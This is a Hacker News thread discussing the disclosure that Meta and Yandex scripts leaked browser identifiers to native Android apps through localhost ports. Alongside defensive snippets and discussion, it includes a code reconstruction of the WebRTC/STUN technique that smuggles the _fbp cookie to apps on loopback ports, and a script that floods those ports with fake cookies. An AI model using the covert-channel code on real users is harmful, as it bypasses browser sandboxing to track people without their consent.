The EU should set some record breaking fines for this.
Maybe it's time to invent a tax that starts at 0% and goes up 1-X% every time your hand is caught in the cookie jar. And add a corresponding website where you can clearly see all violations by company.
There should also be fines, but individuals have gone to jail for less.
I agree they should. But I don't think the EU has any real ability to send American tech execs to jail. At most they can stop them doing business in the EU.
I think dual criminality is satisfied, so extradition is definitely possible.
Meta makes $70 billion net per year, after fines.
Another reason not to install big tech's apps and only use their websites if you must.
Not only are their websites painful, which discourages use; websites are also more sandboxed.
I am not sure which Meta apps open ports, but e.g. Samsung phones come with a bunch of Meta apps pre-shipped. IIRC just removing the Facebook app is not enough; there is another service installed that is not visible as an app (com.facebook.services etc.), which you can only uninstall from the data partition with something like ADB/UAD.
Or buy an iPhone or a Pixel.
I remember a few years ago analyzing a modern Samsung phone's web traffic. It had by far the most ad-related and monetizing connections of any phone I've ever seen. And they were part of "necessary" functions, so you couldn't just block that traffic.
Samsung has great tech, but I avoid them because they're so bloated and abusive.
My Samsung phone has Netflix, Spotify, and some Microsoft stuff installed, but nothing from Meta.
I think Samsung stopped preinstalling Facebook's weird services a while back. Xiaomi still seems to be shipping Facebook last time I checked, though.
Even outside of Samsung a lot of "normal" apps come packed with Facebook crap because of Facebook's SDK (for the "log in with Facebook" button). There was that one incident where many/most iOS apps didn't open anymore because Meta fucked something up on their servers that crashed every app with the Facebook SDK inside of it (https://www.wired.com/story/facebook-sdk-ios-apps-spotify-ti...).
The Pixel "Private Space" feature should prevent Meta apps from running in the background. It also prevents you from getting notifications.
I tend to buy stock Android, e.g. Motorola moto g30, etc. It still has lots of Google stuff, but you can get rid of them, and I have a work profile specifically designed for Google-related stuff, and my personal profile is de-Googled as much as possible.
I would recommend everyone who wants a clean Android to look into Google Pixel phones. Aside from being mostly bloat-free (and most bloat can be uninstalled), it is one of the few phones that supports unlocking/relocking and a secure open source alternative (GrapheneOS).
Does grapheneos prevent this? In what way? I know apps like ShareViaHTTP [1] are able to open ports (listening not just on the loopback address). If I installed a meta app, could it still run its listener that scripts on webpages could talk to?
[1]: https://f-droid.org/packages/com.MarcosDiez.shareviahttp
I didn't say that. Only that GrapheneOS does not come with any adware/malware preinstalled. That said, their default browser did block one of the attack vectors:
https://grapheneos.social/@GrapheneOS/114620254209885149
The article did mention specific versions of Facebook and Instagram.
Samsung devices are loaded with malware and AI slop in general. I'd avoid them if you at all care about privacy. Since Google is still missing end to end encryption for cloud data, iOS seems like the only good choice currently.
iOS sends data to metrics.apple.com, metrics.icloud.com, iadsdk.apple.com, etc. a lot. They are much better than Samsung (who send data to Samsung and other parties), but I am not convinced they are much better than Google devices. It's more who you prefer sending your data to.
In the end something like GrapheneOS is the only good choice. Has all the security features of Pixel (which is similar to iPhone) and the tracking of neither.
Not all metrics are equal. I don't really care if Apple collects anonymized data on which features are most used, or collects crash reports. That's worlds away from using preinstalled apps to backdoor your phone and hand your details to tracking scripts in Incognito Mode.
> Not only are their websites painful, which discourages use; websites are also more sandboxed.
This isn't remotely true. It is pretty trivial for a well-resourced engineering organization to generate unique fingerprints of users with common browser features.
Wouldn't native apps be even worse in that regard, most of the time?
Would an individual using this technique to collect information from someone else's computer possibly face prosecution under the Computer Fraud and Abuse act?
People have been prosecuted under that act for clicking "view source" on their web browser. The crime itself is irrelevant. It's more about who you are/what connections you have/who you piss off.
Has there actually been a conviction purely for "viewing source"?
That was a real news story. A journalist looked at the state's educator-credentials checker, viewed the source, and saw it had teachers' SSNs in Base64 somewhere in the page text. Missouri Governor Mike Parson then tried to legally threaten the journalist. Honestly, if this case hadn't been so high-profile, I think he might have gotten a conviction, at least in state court.
https://www.theregister.com/2022/02/15/missouri_html_hacking...
exactly, the more interesting question: would anyone be willing to prosecute a Meta executive over this? Sadly, I expect no.
This only works if you control the code on both sides (i.e. on the website being visited and in an app running on the phone). It's not some sort of magic hack that allows you to exfiltrate arbitrary browser history. Therefore it's unclear how it can be construed as "hacking" in any meaningful way. As bad as the non-consensual tracking done by Google/Meta/whoever is, it's not covered under the CFAA.
I agree it's not hacking, but the Computer Fraud and Abuse act seems to have a pretty broad definition of computer fraud and abuse. In particular, the technique seems like it might (emphasis mine) "knowingly and with intent to defraud, accesses a protected computer without authorization, or exceeds authorized access, and by means of such conduct furthers the intended fraud and obtains anything of value …". Would the other person have a reasonable belief that they didn't authorize access to information which their OS attempts to prevent access to?
I'm not a lawyer, so my question is genuine.
I don't know, you're purposefully abusing oversights to completely bypass the sandbox. It's an exploit for sure in my mind, and it seems very intentionally done. Like, it was done this way specifically because it allows them to circumvent other protections they know existed.
The yandex one uses client/browser-side code to exfiltrate; it’s within the realm of possibility to abuse this, given a user visits a site under your control.
On the FB side, I can see a malicious user potentially poisoning a target site visitors’s ad profile or even social media algorithm with crafted cookies. Fill their feed with diaper ads or something.
Yes
Two ways to f#ck with these trackers: either send them nothing back, or flood them with lots of fake data.
Somebody also needs to come up with a way to peer to peer share advertiser tracking cookies.
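For the "flood them with fake data" option, here is a rough Node/TypeScript sketch of the idea, assuming the loopback UDP ports named in the report (12580-12585) and the documented fb.1.<timestamp>.<random> shape of the _fbp cookie. Note the real listener expects STUN-framed traffic, so raw strings like these may simply be ignored; this only illustrates the concept.

    import dgram from "node:dgram";

    const socket = dgram.createSocket("udp4");

    // Fabricate a plausible-looking _fbp value.
    function fakeFbp(): string {
      const ts = Date.now() - Math.floor(Math.random() * 1e9);
      const rand = Math.floor(Math.random() * 1e10);
      return `fb.1.${ts}.${rand}`;
    }

    // Once a second, spray a fresh fake cookie at every reported port.
    setInterval(() => {
      const payload = Buffer.from(fakeFbp());
      for (let port = 12580; port <= 12585; port++) {
        socket.send(payload, port, "127.0.0.1");
      }
    }, 1000);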
Can this cross profiles? That would be a big security issue for corps.
Quick test: if I serve on port 8080 in the UserLAnd app, it can be accessed from both profiles. So probably yes.
This means an infected app on your personal profile could exchange data with a site visited from a second profile.
Only if that site specifically communicates with an (unauthenticated) service bound to a local port though, right?
Which, per the OP, the site would be doing by merely including the Meta pixel, which practically every e-commerce and news site does to track its campaigns and organic traffic.
The takeaway is that for all intents and purposes, anything you did in a private session or secondary profile on an Android device with any Meta app installed, was fully connected to your identity in that app for an unknown amount of time. And even with the tracking code deactivated, cookies may still persist on those secondary profiles that still allow for linking future activity.
Yes, but if the concern is not mixing business and personal compartment of the phone, business sites would hopefully not embed a Meta tracking pixel.
> The takeaway is that for all intents and purposes, anything you did in a private session or secondary profile on an Android device with any Meta app installed, was fully connected to your identity
Definitely, and that's a huge problem. I just don't think Android business profiles are a particular concern here; leaking app state to random websites in any profile is the problem.
Or do Android "business profiles" also include browser sessions? Then this would be indeed a cross-compartment leak. I'm not too familiar with Android's compartment model; iOS unfortunately doesn't offer sandboxing between environments that way.
While I agree with your reasoning, in my experience any statement where I prepend "hopefully" usually ends up being the worst possible interpretation in practice.
What I mean is: If a corporate internal website regularly connects to unauthenticated local ports and leaks sensitive data out, that's fully on them.
If they are trying to fingerprint the "private compartment" of a BYOD device, that seems roughly as bad as a non-corporate side doing the same.
100% agree, and fingerprinting BYOD devices would be problematic in a lot of ways.
I'm generally against BYOD programs. They're convenient but usually come from a place of allowing employees access to things without the willingness to take on the cost (both in corp devices and inconvenience of a second phone/tablet/whatever) to run them with a high level of assurance.
Much better in my opinion to use something like PagerDuty or text/push notifications to prompt folks to check a corp device if they have alerts/new emails/whatever.
You can easily click a link, e.g. to a blog post, in Chrome inside your work profile.
E.g. a Jira ticket links to a post on how to do something concurrency-related in Python.
I get your point though that maybe this is no worse than if they visit the site on the personal side.
However I wouldn't trust our lack of imagination on how to exploit this enough to be happy about the security gap!
> do Android "business profiles" also include browser sessions
I believe that is typical.
My business profile has its own instance of Chrome. Mostly used for internal and external sites that require corporate SSO or client certificates. Of course it could be used to browse anything.
webrtc was supposed to be for real-time comms, not fingerprinting people based on what random apps they have running on localhost. the fact that a browser sandbox still leaks this info is wild. like, you’re telling me port 43800 says more about me than a cookie ever could? and of course, this all runs under the radar—no prompt, no opt-in, just “oh hey, we’re just scanning your machine real quick.” insane. might as well call it metascan™.
kinda makes me nostalgic for simpler times—when tracking meant throwing 200 trackers into a <script> tag and hoping one stuck. now it’s full-on black ops.
i swear, i’m two updates away from running every browser in a docker container inside a faraday cage.
Well, primarily it's the other apps that are saying a lot about you. I think this story emphasises yet again that websites are better for your privacy than apps. (Especially in a browser that has e.g. uBlock Origin, such as Firefox for Android.)
The person working on Arcan runs the browser on a separate machine via Remote Desktop with it set to wipe and re-image itself between sessions.
crazy
Yes but I kinda love it. Perfectly safe from any future Rowhammer type exploit.
> webrtc was supposed to be for real-time comms, not fingerprinting people based on what random apps they have running on localhost
Native apps are doing that, not WebRTC. It just proves the web is safer, and that all that BS about native apps being better is, well, BS.
Does the Yandex HTTPS one mean they're shipping the private key for their cert in the app, therefore anything running on localhost (or on a network with poisoned DNS) can spoof the yandexmetrica site?
There is a cert for it in the logs: https://crt.sh/?q=yandexmetrica.com
Yes, but presumably they aren't hosting anything on yandexmetrica.com, so any attacker might as well register yandexmetrica.net and get an SSL cert for that.
These sites both have the same potential for abuse.
Yup definitely. Edit: the diagram makes it perfectly clear https://yandexmetrica.com:30103/p?...
It even looks like some of the certs were issued by Yandex to Yandex. I guess their cert division will end up writing an incident report for this.
All apps + the web browser being able to communicate freely over a shared localhost interface is such a glaring security hole that I'm surprised both iOS and Android allow it. What even is a legitimate use case for an app starting a local web server?
> What even is a legitimate use case for an app starting a local web server?
There are apps on iOS that act as shared drives that you can attach via WebDAV. This requires listening on a port for inbound WebDAV (HTTP) requests.
They don't need to listen on localhost though.
I expose a LAN accessible status board from an app via HTTP. The app runs completely offline, thus I can't rely on something hosted on the public internet.
My last electron app did effectively the same thing. I took the hosted version of my app and bundled in electron for offline usage with the bundled app being just a normal web application started by electron.
Which begs the question: why is this specific to Android? Why would Meta/Yandex not be doing this on iOS, or why did this study not report on iOS?
Doesn't iOS prompt you to give apps permission to connect to your local network? "App would like to find and connect to devices on your local network" or something along those lines. I always hit the "no thanks" button.
In this case it's the web browser connecting to the network, so the permission is irrelevant.
A long time ago I used it to work around an iOS limitation that prevented apps from simultaneously streaming audio and caching it. You could give the media player a URL for a remote stream, but you couldn’t read the same stream. The alternative was to get the stream yourself and implement your own media player. I didn’t want to write my own media player, so I requested the stream myself in order to cache it, plus fed it back to the OS media player via localhost http. Total hack, but it worked great. I wonder if they ever took that code out. It’s got hundreds of millions of installs at this point.
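The same trick, sketched in Node/TypeScript terms rather than the original iOS code (the stream URL, port, and cache path are all made up): a loopback HTTP server fetches the remote stream once, writes a cache copy, and feeds identical bytes to the system media player.

    import http from "node:http";
    import https from "node:https";
    import fs from "node:fs";

    const REMOTE = "https://example.com/stream.mp3"; // hypothetical stream

    http
      .createServer((req, res) => {
        https.get(REMOTE, (upstream) => {
          res.writeHead(upstream.statusCode ?? 200, upstream.headers);
          const cache = fs.createWriteStream("/tmp/stream-cache.mp3");
          upstream.pipe(cache); // keep a copy as it streams
          upstream.pipe(res);   // feed the same bytes to the player
        });
      })
      .listen(8765, "127.0.0.1");

    // The media player is then pointed at http://127.0.0.1:8765/ instead
    // of the remote URL, so playback and caching share one download.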
A comment I wrote in another HN thread [0] covering this issue:
Web apps talking to LAN resources is an attack vector which is surprisingly still left wide open by browsers these days. uBlock Origin has a filter list that prevents this called "Block Outsider Intrusion into LAN" under the "Privacy" filters [1], but it isn't enabled on a fresh install, it has to be opted into explicitly. It also has some built-in exemptions (visible in [1]) for domains like `figma.com` or `pcsupport.lenovo.com`.
There are some semi-legitimate uses, like Discord using it to check if the app is installed by scanning some high-number ports (6463-6472), but mainly it's used for fingerprinting by malicious actors like shown in the article.
Ebay for example uses port-scanning via a LexisNexis script for fingerprinting (they did in 2020 at least, unsure if they still do), allegedly for fraud prevention reasons [2].
I've contributed some to a cool Firefox extension called Port Authority [3][4] that's explicitly for blocking LAN intruding web requests that shows the portscan attempts it blocks. You can get practically the same results from just the uBlock Origin filter list, but I find it interesting to see blocked attempts at a more granular level too.
That said, both uBlock and Port Authority use WebExtensions' `webRequest` [5] API for filtering HTTP[S]/WS[S] requests (a minimal sketch of that style of blocking follows after the links below). I'm unsure how the arcane WebRTC tricks mentioned relate to the requests exposed to this API; it's possible they circumvent the reach of available WebExtensions blocking methods, which wouldn't be good.
0: https://news.ycombinator.com/item?id=44170099
1: https://github.com/uBlockOrigin/uAssets/blob/master/filters/...
2: https://nullsweep.com/why-is-this-website-port-scanning-me/
3: https://addons.mozilla.org/firefox/addon/port-authority
4: https://github.com/ACK-J/Port_Authority
5: https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/Web...
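For reference, a minimal sketch of the webRequest-style blocking mentioned above, written as a Firefox Manifest V2 background script in TypeScript. The regex and the cross-origin heuristic are my own assumptions, and a real blocker (like Port Authority [3] or the uBlock filter list [1]) handles far more cases:

    // manifest.json needs "webRequest", "webRequestBlocking" and "<all_urls>".
    const LOCAL = /^(https?|wss?):\/\/(127\.\d+\.\d+\.\d+|localhost|\[::1\])(:\d+)?/i;

    browser.webRequest.onBeforeRequest.addListener(
      (details) => {
        // Only block cross-origin requests: a page served from localhost
        // may legitimately talk to itself.
        const initiator = details.originUrl ?? details.documentUrl ?? "";
        if (LOCAL.test(details.url) && initiator && !LOCAL.test(initiator)) {
          return { cancel: true };
        }
        return {};
      },
      { urls: ["<all_urls>"] },
      ["blocking"]
    );

As the parent comment notes, this only sees HTTP[S]/WS[S]; the WebRTC/STUN channel never shows up in webRequest, which is exactly why it was such an effective loophole.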
There is a specification for blocking this:
https://wicg.github.io/private-network-access/
It gained support from WebKit:
https://github.com/WebKit/standards-positions/issues/163
…and Mozilla:
https://github.com/mozilla/standards-positions/issues/143
…and it was trialled in Blink:
https://developer.chrome.com/blog/private-network-access-upd...
Unfortunately, it’s now on hold due to compatibility problems:
https://developer.chrome.com/blog/pna-on-hold
Yep! Unfortunately its main method (as far as I remember from when I first read the proposal at least, it may do more) is adding preflight requests and headers to opt-in, which works for most cases yet doesn't block behind-the-lines collaborating apps like mentioned in the main article. If there's a listening app (like Meta was caught doing) that's expecting the requests, this doesn't do much to protect you.
EDIT: Looks like it does mention integrating into the permissions system [0], I guess I missed that. Glad they covered that consideration, then!
0: https://wicg.github.io/private-network-access/#integration-p...
Both Firefox [0] and Chrome [1] are working on successors which rely on permissions prompts instead of preflight requests.
[0] https://groups.google.com/a/mozilla.org/g/dev-platform/c/B8o...
[1] https://groups.google.com/a/chromium.org/g/blink-dev/c/CDy8L...
The Firefox bug referenced in [0] is open since 2018 (https://bugzilla.mozilla.org/show_bug.cgi?id=1481298)?!
What is so difficult about this?
0. Define 2 blocklists: one for local domains and one for local IP addresses
1. Add a per-origin permission next to the already existing camera, mic, MIDI, etc. Let's call it LocalNetworkAccess, set to false by default.
2. Add 2 checks in networking stack:
2a. Before DNS resolution, check the origin's LocalNetworkAccess permission. If false, check the URL domain against the domain blocklist and deny the request if it matches.
2b. Before the TCP or UDP connect, check the origin's LocalNetworkAccess permission. If false, check the remote IP address against the IP blocklist and deny the request if it matches.
3. If a request was denied, prompt the user to allow or disallow the LocalNetworkAccess permission for the origin, the same way the camera, mic, or MIDI permission is already prompted for.
This is a trivial solution; there is no way this takes more than 200-300 lines of code to implement in any browser engine. Why is it taking years?!
And then of course one can add browser-specific config options to customize the blocklists, but figure that out only after the imminent vulnerability has been fixed.
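A sketch of steps 1-3 in TypeScript-flavored pseudocode; LocalNetworkAccess, the blocklists, and the prompt are the hypothetical design from the list above, not any real browser API:

    type Permission = "granted" | "denied" | "prompt";

    // step 0: the two blocklists
    const LOCAL_DOMAINS = new Set(["localhost", "localhost.localdomain"]);
    const LOCAL_IPS = /^(127\.|10\.|192\.168\.|169\.254\.|::1$|fe80:|f[cd])/i;

    // step 2a: called before DNS resolution
    function allowDns(perm: Permission, host: string): boolean {
      return LOCAL_DOMAINS.has(host) ? decide(perm) : true;
    }

    // step 2b: called before the TCP/UDP connect
    function allowConnect(perm: Permission, remoteIp: string): boolean {
      return LOCAL_IPS.test(remoteIp) ? decide(perm) : true;
    }

    // steps 1 and 3: per-origin permission, default deny, prompt on first use
    function decide(perm: Permission): boolean {
      if (perm === "granted") return true;
      if (perm === "denied") return false;
      return promptUser(); // stand-in for the camera/mic-style dialog
    }

    function promptUser(): boolean {
      return false; // default-deny in this sketch
    }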
> There are some semi-legitimate uses, like Discord using it to check if the app is installed by scanning some high-number ports (6463-6472)
I would not consider this a legitimate use. Websites have no business knowing what apps you have installed.
I agree, yet at least you can kind of see where they're coming from.
I guess a better example would be the automatic hardware detection Lenovo Support offers [0] by pinging a local app (with some clear confirmation dialogs first). Asus seems to do the same thing.
uBlock Origin has a fair few explicit exceptions [1] for cases like those (and other reasons) in its filter list to avoid breakage (notably Intel domains, the official Judiciary of Germany [2] (???), `figma.com`, `foldingathome.org`, etc).
0: https://pcsupport.lenovo.com/
1: https://github.com/uBlockOrigin/uAssets/blob/master/filters/...
2: https://github.com/uBlockOrigin/uAssets/issues/23388 and https://www.bundesjustizamt.de/EN/Home/Home_node.html (they're trying to talk to a local identity verification app seems like, yet I find it quite funny)
> the official Judiciary of Germany [2] (???)
That's the e-ID function of our personal ID cards (notably, NOT the passports). The user flow is:
1. a client (e.g. the Deutsche Rentenversicherung, Deutschland-ID, Bayern-ID, municipal authorities and a few private sector services as well) wishes to get cryptographically authenticated data about a person (name and address).
2. the web service redirects to Keycloak or another IDP solution
3. the IDP solution calls the localhost port with some details on what exactly is requested, what public key of the service is used, and a matching certificate signed by the Ministry of Interior.
4. The locally installed application ("AusweisApp") now opens and displays these details to the user. When the user wishes to proceed, they click a "proceed" button and are then prompted to either insert the ID card into an NFC reader attached to the computer, or to use a smartphone on the same network that also has the AusweisApp installed.
5. The ID card's chip verifies the certificate as well and asks for a PIN from the user
6. the user enters the PIN
7. the ID card chip now returns the data stored on it
8. the AusweisApp submits an encrypted payload back to the calling IDP
9. the IDP decrypts this data using its private key and redirects back to the actual application.
There is a bunch of cryptography additionally layered in the process that establishes a secure tunnel, but it's too complex to explain here.
In the end, it's a highly secure solution that makes sure the ID card only responds with sensitive information when the right configuration and conditions are met - unlike, say, the Croatian ID card, which will go as far as delivering the picture on the card in digital form to anyone tapping it with their phone. And that's also why it's impossible to implement in any other way - maaaaybe WebUSB, but you'd need to ship an entire PC/SC stack, and I'm not sure WebUSB allows claiming a USB device that already has a driver attached.
In addition, the ID card and the passport also contains an ICAO compliant method of obtaining the data in the MRZ, but I haven't read through the specs of that enough to actually implement this.
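In browser terms, step 3 looks roughly like the sketch below. The loopback port 24727 and the /eID-Client path are from the German eID client specification (TR-03124) as I remember it, and the tcTokenURL is a made-up example, so treat the specifics as assumptions:

    // The IDP sends the browser to the locally listening AusweisApp.
    const tcTokenURL = encodeURIComponent(
      "https://idp.example.de/eid/tctoken?session=abc123" // hypothetical
    );
    window.location.href =
      `http://127.0.0.1:24727/eID-Client?tcTokenURL=${tcTokenURL}`;
    // The AusweisApp fetches the TcToken itself, shows the consent UI
    // (step 4), and eventually redirects the browser back to the IDP (step 9).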
Zoom got busted for something similar five years ago now: https://www.zdnet.com/article/zoom-defends-use-of-local-web-...
IMO browsers should not just block the request but block the whole website with one of those scary giant red banners if something like this is attempted. If all websites get for trying to work around privacy protections is that their attempts might not succeed then there is little incentive not to try.
Your DNS server not resolving to localhost may also serve as an additional line of defense.
What does this have to do with the issue here? A website can just connect to 127.0.0.1 , no DNS needed.
I think what you are thinking of are dns rebinding attacks.
I built a little LAN tool, https://router.fyi, that tries to get LAN data for a sort of online nmap. Depending on your browser, it's sometimes capable of finding WiFi printers and a couple of other smart home devices I've manually added.
Firefox about:config toggle media.peerconnection.enabled from true to false
Further, Netguard plus Nebulo in non-VPN mode can stop unwanted connections to Meta servers
Does about:config work on Firefox Android?
It works on Fennec from F-Droid.
What are some reasons to use Firefox Android instead of Firefox Nightly? The latter is available from Aurora Store.
IME, Nightly has better add-on support. For example, uMatrix works.
Of course the ID was easy to abuse, and I assume Google knew this, and also knew they'd need to have rules against abuse... and that they'd need to back up the rules with penalties, like Play Store permaban, legal action for damages, and maybe even referral for criminal investigation (CFAA violation?).
Unfortunately, even if they did have such rules, in this case, Meta is a too-big-to-deplatform tech company.
(Also, even if it wasn't Meta, sketchy behavior of tech might have the secret endorsement of IC and/or LE. So, making the sketchiness stop could be difficult, and also difficult to talk about.)
Google and Apple own their whole operating systems. They can do tracking directly in 50 different ways. Other corporations routinely renegotiate deals on sharing user surveillance data with them, for big, big money. So it has all already been paid for, and authorised. The only problem is that some stupid serfs are still making a fuss over it.
Why don't all browsers, desktop and mobile, just block all cross-origin access to localhost?
For one I think it would break all those "update your BIOS via your motherboard website" apps that probably shouldn't exist anyways.
There probably are some legitimate uses, but I'm straining to come up with them.
Maybe just ask for confirmation
There's effort to define standard behavior here. See https://wicg.github.io/private-network-access/ (although I suspect this document may make a significant shift soon)
I thought they did for resources and JS, which is why Meta have to use WebRTC instead?
I think the Yandex one slips through because CORS does a naive check against just what's in the header, not what it resolves to?
I'm surprised browsers don't isolate each of the localhost/localnet/internet networks from each other. Are there any use-cases for allowing this?
If I recall correctly Figma uses it to connect to the locally installed app, and Discord definitely uses it to check if its desktop app is installed by scanning ports (6463-6472).
I'm aware of two blockers for LAN intrusions from public internet domains, uBlock Origin has a filter list called "Block Outsider Intrusion into LAN" [0] under the "Privacy" filters, and there's a cool Firefox extension called Port Authority [1][2] that does pretty much the same thing yet more specifically targeted and without the exclusions allowed by the uBlock filterlist (stuff like Figma's use is allowed through, as you can see in [0]). I've contributed some to Port Authority, too :)
0: https://github.com/uBlockOrigin/uAssets/blob/master/filters/...
1: https://addons.mozilla.org/firefox/addon/port-authority
2: https://github.com/ACK-J/Port_Authority
There are surely other ways to achieve this. If you are logged into an app and the site at the same time, they can use the server to communicate. Discord doesn't need to know if the app is installed for this to work. That sounds sketchy.
It's just a way to ensure you open the desired context on a local Discord instance, not any instance that might be logged in to your account. I have a few personal computers logged in on Discord on the same account that could be active at the same time for example.
The native messaging feature is a much better way to talk to native apps, that should be used instead for modern browsers.
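For contrast with silent localhost ports, a minimal sketch of that native messaging channel from the extension side; com.example.companion is a hypothetical host name the native app must register in a host manifest, which is what makes the channel consentful:

    // Extension background script; requires the "nativeMessaging"
    // permission (Chrome uses chrome.runtime.connectNative instead).
    const port = browser.runtime.connectNative("com.example.companion");

    port.onMessage.addListener((msg: unknown) => {
      console.log("native app says:", msg);
    });

    // Messages are JSON exchanged over the app's stdin/stdout.
    port.postMessage({ ping: true });

Crucially, only an extension the user installed can open this channel; an arbitrary website cannot, which is the whole point.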
A commenter mentioned [1] that major Russian apps now all ask for permission to read a unique device ID to deanonymize users. The people that stopped Intel from adding such an ID to their CPUs had perfect foresight [2] (too bad Intel later added it anyway). But then it's not hard to guess that if you include a feature whose purpose is to attack the user, it will be used to attack the user.
[1] https://arstechnica.com/security/2025/06/meta-and-yandex-are...
[2] https://en.wikipedia.org/wiki/Pentium_III#Controversy_about_...
>A commenter mentioned [1] that major Russian apps now all ask for permission to read a unique device ID to deanonymize users.
To be fair, it's not really limited to Russian apps. Many popular apps on the Play Store have it as well:
https://play.google.com/store/apps/details?id=org.telegram.m...
https://play.google.com/store/apps/details?id=com.microsoft....
https://play.google.com/store/apps/details?id=com.pinterest&...
I love how the engineers and product managers who implemented this are not held responsible in any meaningful way.
Love the url slug: headline-to-come. It now redirects to a more boring one though.
If you work for meta, you're on the baddies team.
(Other bad guys are around too)
Not surprising; it's legal, but only if you are a multi-billion dollar company.
Probably hard to do for many, but the solution seems to be not to have their apps installed. It's crazy to me that people tolerate FB et al. on their devices, where you have absolutely no control over what they're doing.
I agree wrt Facebook, but there’s a long tail of useful apps-that-should-be-websites; 1 click for an app versus 45 seconds searching through tabs and re-logging in (etc) can be meaningful, especially when there are fifty of them.
My healthcare provider recently yanked the mobile version of their portal website, and forces users to download their app. Personally, I see the security angle, but still feel like it’s a punch in the face and so I just went back to paper billing and using a PC for healthcare stuff. More of this is coming, I suspect.
Yup. When I deleted the FB, X, and Reddit apps both my productivity and my phone's battery life skyrocketed.
I assume that's why those companies try to actively degrade the experience on the website.
Reddit has fairly intense device fingerprinting. And they sell data for AI training.
I'm using RethinkDNS as a combined firewall and wireguard VPN. I added these two block rules:
127.0.0.0/8
::1/128
I'll update here with any issues.
We changed the URL from https://arstechnica.com/security/2025/06/meta-and-yandex-are... which is a report about this disclosure.
No doubt, whatever "vulnerability" is found, you have already agreed to it in some buried TOS.
Is there a similar thing on iOS? I always wonder when a random app asks to “find devices on my network”
Possible, but potentially not as practical due to iOS's restrictive background process model. There, background tasks are generally expected to quickly do whatever it is they need to and exit, and generally can't run indefinitely. Periodic tasks are scheduled by the OS, with scheduling requests from apps being more likely to be honored if their processes are well-behaved (quick, low resource, don't crash, and don't run too frequently), and badly-behaved processes getting run less often.
Apps that keep themselves open by reporting that they're playing audio might be able to work around this, but it'd still be spotty, since users frequently play media, which would suspend those backgrounded apps and eventually bump them out of memory.
This is answered on the page.
It’s probably easier to buy that data directly from Apple.
Google’s core business is built on tracking data, so they would be reluctant to sell, necessitating covert collection.
Can you link the page where you can buy that data?
> That said, similar data sharing between iOS browsers and native apps is technically possible.
Does that work across profiles? I have to use some apps from such spyware-oriented companies and usually put them in an isolated profile with Shelter.
I wonder whether local ports opened in isolated "work" android profile are accessible by main profile.
Sounds like loading from the domains serving the meta pixel should be blockable in the first place.
A quite obvious attack mechanism, I'm surprised browsers permitted this in the first place. I can't think of a reason to STUN/TURN to localhost. Aside from localhost, trackers can also use all other IP addresses available to the browser to bind their apps/send traffic to.
Now that the mechanism is known (and widely implemented), one could write an app to notify users about attempted tracking. All you need to do is to open the listed UDP ports and send a notification when UDP traffic comes in.
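A sketch of that detector idea in Node/TypeScript (a real user-facing version would be an Android app, but the bind-and-alert approach is the same; the ports are the ones from the report):

    import dgram from "node:dgram";

    for (let port = 12580; port <= 12585; port++) {
      const sock = dgram.createSocket("udp4");
      sock.on("message", (msg, rinfo) => {
        // Traffic here means some page is trying the Meta-style localhost
        // channel; alert the user instead of forwarding anything.
        console.warn(
          `tracking attempt on udp/${port}: ${msg.length} bytes from ${rinfo.address}`
        );
      });
      // If the bind fails, a real listener may already hold the port.
      sock.on("error", () => sock.close());
      sock.bind(port, "127.0.0.1");
    }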
For shits and giggles I was pondering whether it would be possible to modify Android to hand out a different, temporary IPv6 address to every app and segment off any other interface that might be exposed, just because of shit like this (and use CLAT or some fallback mechanism for IPv4 connectivity). I thought this stuff was just a theoretical problem, because it would be silly to be so blatant about tracking, but Facebook proves me wrong once again.
I hope EU regulators take note and start fining the websites that load these trackers without consent, but I suspect they won't have the capacity to do it.
> modify Android to hand out a different, temporary IPv6 address to every app
AFAIK this is on the Android roadmap and one of the key reasons they don't want to support DHCPv6. They want each app to have their own IP.
> hand out a different, temporary IPv6 address to every app and segment off any other interface that might be exposed
Yes, but (AFAIK) not out of the box (unless one of the security focused ROMs already supports this). The kernel supports network namespaces and there's plenty of documentation available explaining how to make use of those. However I don't know if typical android ROMs ship with the necessary tooling.
Approximately, you'd just need to patch the logic where zygote changes the PID to also configure and switch to a network namespace.
I've looked into network namespaces a bit but from what I can tell you need to do a lot of manual routing and other weird stuff to actually make IPv6 addresses reachable through them.
In theory all you need to do is have zygote constrain the app further with a network namespaces, and run a CLAT daemon for legacy networks, but in practice I'm not sure if that approach works well with 200 apps that each need their IPs rotated regularly.
Plus, you'd need to reconfigure the sandbox when switching between WiFi/5G/ethernet. Not impossible to overcome, but not the weekend project I'd hoped it would be.
I don't follow? Your system is either routing packets or not. IPv6 vs IPv4 should not be a notable difference here.
I've never tested network namespace scalability on a mobile device but I doubt a few hundred of them should break anything (famous last words).
In the primary namespace you will need to configure some very basic routing. You will also need a solution for assigning IP addresses. That solution needs to be able to rotate IP assignments when the external IP block changes. That's pretty standard DHCP stuff. On a desktop distro doing the equivalent with systemd-networkd is possible out of the box with only a handful of lines in a config file.
Honestly a lot of Docker network setups are much more complicated than this. The difficult part here is not the networking but rather patching the zygote logic and authoring a custom build of android that incorporates the changes.
"UPDATE: As of June 3rd 7:45 CEST, Meta/Facebook Pixel script is no longer sending any packets or requests to localhost. The code responsible for sending the _fbp cookie has been almost completely removed."
I'm surprised they're allowed to listen on UDP ports, IIRC this requires special permissions?
> The Meta (Facebook) Pixel JavaScript, when loaded in an Android mobile web browser, transmits the first-party _fbp cookie using WebRTC to UDP ports 12580–12585 to any app on the device that is listening on those ports.
Borders on criminal behavior.
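For those wondering how JavaScript gets a browser to spray cookie-bearing UDP at localhost at all, here is a rough TypeScript reconstruction of the SDP-munging technique as I read the disclosure. The field placement and candidate string are my assumptions, the payload would need transcoding to valid ice-ufrag characters, and browsers have since moved to block munging:

    // Reconstruction of the reported trick, not Meta's actual code.
    async function leakViaStun(fbp: string): Promise<void> {
      const pc1 = new RTCPeerConnection();
      const pc2 = new RTCPeerConnection(); // throwaway peer to complete signaling
      pc1.createDataChannel("x"); // force ICE gathering

      const offer = await pc1.createOffer();
      // "Munge" the SDP before applying it: smuggle the payload into the
      // ICE username fragment, which STUN binding requests then carry.
      const munged = offer.sdp!.replace(/^a=ice-ufrag:.*$/m, `a=ice-ufrag:${fbp}`);
      await pc1.setLocalDescription({ type: "offer", sdp: munged });

      await pc2.setRemoteDescription({ type: "offer", sdp: munged });
      const answer = await pc2.createAnswer();
      await pc2.setLocalDescription(answer);
      await pc1.setRemoteDescription(answer);

      // Hand pc1 fabricated "remote" candidates on the loopback ports from
      // the report; its STUN connectivity checks now go straight to the app.
      for (let port = 12580; port <= 12585; port++) {
        await pc1.addIceCandidate({
          candidate: `candidate:0 1 udp 2122252543 127.0.0.1 ${port} typ host`,
          sdpMid: "0",
        });
      }
    }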
